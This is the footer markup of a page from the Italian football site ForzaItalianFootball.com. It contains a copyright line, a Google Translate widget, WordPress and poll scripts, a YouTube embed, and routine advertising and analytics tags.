 <div id="btt">   <a href="#top"> </a>  </div> 	</div>    <div class="cb"></div>  
<center><ul id="fnav">  
 	</ul></center>  
     <div style="clear: both;"> </div>     </div>  </div>
 <div id="footer2">  <div id="footerwrapper2"> 
      <div id="fotbot">
      <div class="fotlogoleft"> 
        <div class="fotcopy">
    © 2015 SN&CK Media Limited, trading as Snack Media | Images provided by Action Images / Reuters 
        </div>     		  </div>
	   	<div class="fotlogoright">
	      	</div>    	<div class="cb"></div>
   </div>  </div>   	</div></div>

    <script>
      jQuery(document).ready(function($) {
        $("a.nturl").on("click",function() {
	  default_lang = "en";
	  lang_prefix = $(this).attr("class").split(" ")[2];
			  
	  if (lang_prefix == default_lang) {			   
	    load_default();
	  } else {
	    load_selected_language();
	  }
			 
	  function load_default() {
	    doGoogleLanguageTranslator(default_lang + "|" + default_lang);
	  }
			 
	  function load_selected_language() {
	    doGoogleLanguageTranslator(default_lang + "|" + lang_prefix);
	  }
        });
		  
        $("a.flag").on("click",function() {
          default_lang = "en";
	  lang_prefix = $(this).attr("class").split(" ")[2];
			  
	  if (lang_prefix == default_lang) {			   
	    load_default();
	  } else {
	    load_selected_language();
          }
			 
	  function load_default() {
	    doGoogleLanguageTranslator(default_lang + "|" + default_lang);
	  }
			 
	  function load_selected_language() {
	    doGoogleLanguageTranslator(default_lang + "|" + lang_prefix);
	  }
        });

        if ($ ("body > #google_language_translator").length == 0) {
          $("#glt-footer").html("<div id='google_language_translator'></div>");
        }
      });
    </script>

    <div id='glt-footer'></div><script type='text/javascript'>function GoogleLanguageTranslatorInit() { new google.translate.TranslateElement({pageLanguage: 'en', autoDisplay: false}, 'google_language_translator');}</script><script type='text/javascript' src='//translate.google.com/translate_a/element.js?cb=GoogleLanguageTranslatorInit'></script><script type='text/javascript' src='http://forzaitalianfootball.com/wp-includes/js/comment-reply.min.js?ver=4.7'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/forzaitalianfootball.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.2'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-includes/js/wp-embed.min.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-includes/js/swfobject.js?ver=2.2-20120417'></script>

<script type="text/javascript">
	swfobject.embedSWF("http://www.youtube.com/v/ZmmOVh13NZ0&#038;rel=0&#038;fs=1&#038;showsearch=0&#038;showinfo=0", "vvq-158011-youtube-1", "640", "440", "10", vvqexpressinstall, vvqflashvars, vvqparams, vvqattributes);
</script>

  <div class="ad11"><!-- VisualDNA Audience Analytics Tag -->
<script type="text/javascript">
 (function() {
 var s, e;
 s = document.createElement("script");
 s.src = "//a1.vdna-assets.com/analytics.js";
 s.async = true;
 e = document.getElementsByTagName("head")[0];
 e.insertBefore(s, e.firstChild);
 this.VDNA = this.VDNA || {};
 this.VDNA.queue = this.VDNA.queue || [];
 })();
 VDNA.queue.push({
 apiKey : "snackmedia1456226736887",
 method : "reportPageView"
 });
</script>
<!-- End of VisualDNA Audience Analytics Tag --></div>


<!--JavaScript Tag with group ID // Tag for network 1639: Snack Media  // Website: ForzaItalianFootball.com // Page: ROS // Placement: ForzaItalianFootball 1x1 (5597754) // created at: May 18, 2015 10:02:42 AM-->
<script language="javascript">
<!--
if (window.adgroupid == undefined) {
	window.adgroupid = Math.round(Math.random() * 1000);
}
document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtech.de/addyn/3.0/1639/5597754/0/16/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp='+window.adgroupid+';misc='+new Date().getTime()+'"></scri'+'pt>');
//-->
</script><noscript><a href="http://adserver.adtech.de/adlink/3.0/1639/5597754/0/16/ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv/3.0/1639/5597754/0/16/ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="1" height="1"></a></noscript>
<!-- End of JavaScript Tag -->

<meta property="fb:pages" content="157605524250079" />

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-1313722-16']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script> 

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-PMcfgk8BkkkCD"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-PMcfgk8BkkkCD.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag --> 

<script type="text/javascript" async src="http://znaptag-tags-uk.s3.amazonaws.com/forzaitalianfootball.js"></script>     

	</body> 
</html>

<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using memcached
Content Delivery Network via Rackspace Cloud Files: assets.forzaitalianfootball.com

 Served from: forzaitalianfootball.com @ 2017-01-08 04:10:16 by W3 Total Cache -->